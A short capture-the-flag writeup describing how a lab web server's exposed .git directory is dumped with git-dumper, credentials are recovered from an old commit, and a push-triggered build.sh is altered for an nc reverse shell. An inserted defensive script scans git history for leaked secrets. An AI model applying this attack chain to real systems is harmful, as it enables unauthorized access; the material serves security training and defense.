Extract the repo with git-dumper (https://github.com/arthaud/git-dumper)
Find the credentials in the git history of an old branch
Write to the repo with the extracted creds and get code execution
Complete Writeup
With gobuster, we found that there is a .git directory on the server.
Then we installed git-dumper with pip3 install git-dumper
Then extracted the repo with:
~/.local/bin/git-dumper https://ea439dee-8c4d-4ead-aa86-40a208094d02.idocker.vuln.land//website-repo/.git ~/Documents/openecsc/repo_dump
There was nothing too interesting in the files.
With gitkraken we did some further exploration and found an old version of the README.md which had credentials in it:
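The finding above works because deleting a secret in a later commit leaves it reachable in the history of every branch. As an added example (not part of the original writeup), a defender-side audit that parses the output of git log --all -p and reports credential-looking lines that were ever added; the regex and the embedded sample log are constructed assumptions.

```python
import re
import subprocess
import sys

# Heuristic for credential-looking assignments (assumption; tune per project).
SECRET_RE = re.compile(r"(?i)\b(pass(word|wd)?|secret|token|api[_-]?key)\b\s*[:=]\s*\S+")

# Constructed, abbreviated sample (newest commit first): the secret is gone from the
# current README.md but still sits in the older commit that introduced it.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,2 +1,2 @@
 # website
-deploy user: ci / password: example-not-real
+See the wiki for deployment.
commit 2222222222222222222222222222222222222222
diff --git a/README.md b/README.md
--- /dev/null
+++ b/README.md
@@ -0,0 +1,2 @@
+# website
+deploy user: ci / password: example-not-real
"""

def scan_log(log_text):
    """Return (commit, path, line) for every added line that matches SECRET_RE."""
    findings, commit, path, in_hunk = [], None, None, False
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit, in_hunk = line.split()[1], False
        elif line.startswith("diff --git "):
            in_hunk = False
        elif not in_hunk and line.startswith("+++ "):
            path = line[4:].removeprefix("b/")  # file header, not file content
        elif line.startswith("@@"):
            in_hunk = True
        elif in_hunk and line.startswith("+") and SECRET_RE.search(line):
            findings.append((commit, path, line[1:].strip()))
    return findings

if __name__ == "__main__":
    log = SAMPLE_LOG
    if len(sys.argv) > 1:  # path to a clone; --all walks every branch and tag, not just HEAD
        cmd = ["git", "-C", sys.argv[1], "log", "--all", "-p", "--format=commit %H"]
        log = subprocess.run(cmd, capture_output=True, text=True, errors="replace", check=True).stdout
    for commit, path, text in scan_log(log):
        print(f"{commit[:12]} {path}: {text}")
```

A hit in history means the credential has to be rotated; removing it from the current tree does not remove it from existing clones or from an exposed .git directory.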
As the build.sh gets executed on each push, we modified it to get us a nc reverse shell back: